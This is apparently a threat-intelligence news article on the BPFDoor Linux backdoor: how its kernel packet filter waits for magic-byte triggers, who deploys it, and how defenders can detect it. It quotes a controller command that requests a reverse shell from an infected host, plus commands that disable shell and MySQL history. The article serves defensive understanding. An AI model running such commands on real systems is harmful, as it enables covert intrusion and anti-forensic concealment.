A sophisticated backdoor malware known as BPFDoor has been actively targeting organizations across Asia, the Middle East, and Africa, leveraging advanced stealth techniques to evade detection.
This Linux backdoor uses a Berkeley Packet Filter (BPF) program loaded into the kernel to inspect network traffic, which lets it stay hidden from conventional security scans while keeping persistent access to compromised systems.
BPFDoor has been observed targeting telecommunications, finance, and retail sectors with recent attacks documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.
Because the malware never binds a listening port, it is invisible to port scans and to listening-socket listings such as netstat or ss, which lets it remain undetected for extended periods.
Trend Micro researchers attribute these attacks to Earth Bluecrow (also tracked as Red Menshen), an advanced persistent threat (APT) group that has been deploying BPFDoor for cyberespionage.
According to their telemetry, the group has been active for at least four years, with evidence of multiple incidents dating back to 2021.
The malware loads a BPF filter into the kernel, attached to a sniffing socket, so the kernel inspects incoming packets on the backdoor's behalf and passes it only those that carry a "magic sequence", a predetermined byte pattern that triggers a specific backdoor function. Because the filter sees traffic before it is delivered to any application, the trigger can arrive on any port, including one already used by a legitimate service.
Combined with rootkit-like evasion such as renaming its process, this lets BPFDoor blend into the system and avoid detection.
For organizations affected by BPFDoor, the implications are severe. The backdoor creates a persistent, nearly invisible channel for threat actors to access sensitive data and systems over extended periods, making it an ideal tool for long-term espionage operations.
Reverse Shell Mechanism: The Hidden Controller
At the heart of BPFDoor’s capabilities is its controller module, which enables attackers to establish reverse shell connections to infected hosts.
This functionality allows threat actors to dig deeper into compromised networks, facilitating lateral movement and access to additional systems and sensitive data.
The controller sends activation packets containing magic bytes (such as 0x5293 for TCP or 0x7255 for UDP), the remote IP address and port for the target to connect to, and an authentication password.
If the password is accepted, the implant opens a reverse shell connection from the victim machine back to the attacker's system.
./controller -cd 22 -h 192.168.32.156 -ms 8000
This command tells the controller to send the activation packet to port 22 on the infected machine (192.168.32.156) and to request a reverse shell back to the attacker's machine on port 8000. Port 22 does not have to belong to the backdoor: the BPF filter sees the packet whichever service owns the port, which is exactly why port scans do not reveal the implant.
Once a shell is obtained, the operators also take care to leave no command history on the compromised host:
export MYSQL_HISTFILE=/dev/null
export HISTFILE=/dev/null
These commands disable history logging for the interactive shell and for the mysql client respectively, suggesting the attackers expected to interact with MySQL database software on the targeted systems. They only affect processes started afterwards in that session; history files already on disk are left as they are, so earlier activity may still be recoverable.
For network defenders, detecting BPFDoor remains challenging because it operates across multiple protocols (TCP, UDP and ICMP) and because the magic byte sequences used for activation are trivial for attackers to change, so signatures keyed on known magic values only catch unmodified samples.
As the threat continues to evolve, organizations should pair network monitoring for known activation patterns with host-based checks that target the mechanism rather than the bytes: raw or packet sockets held by unexpected processes (visible, for example, in /proc/net/packet), BPF filters attached to such sockets, and processes whose names do not match the binary they were started from.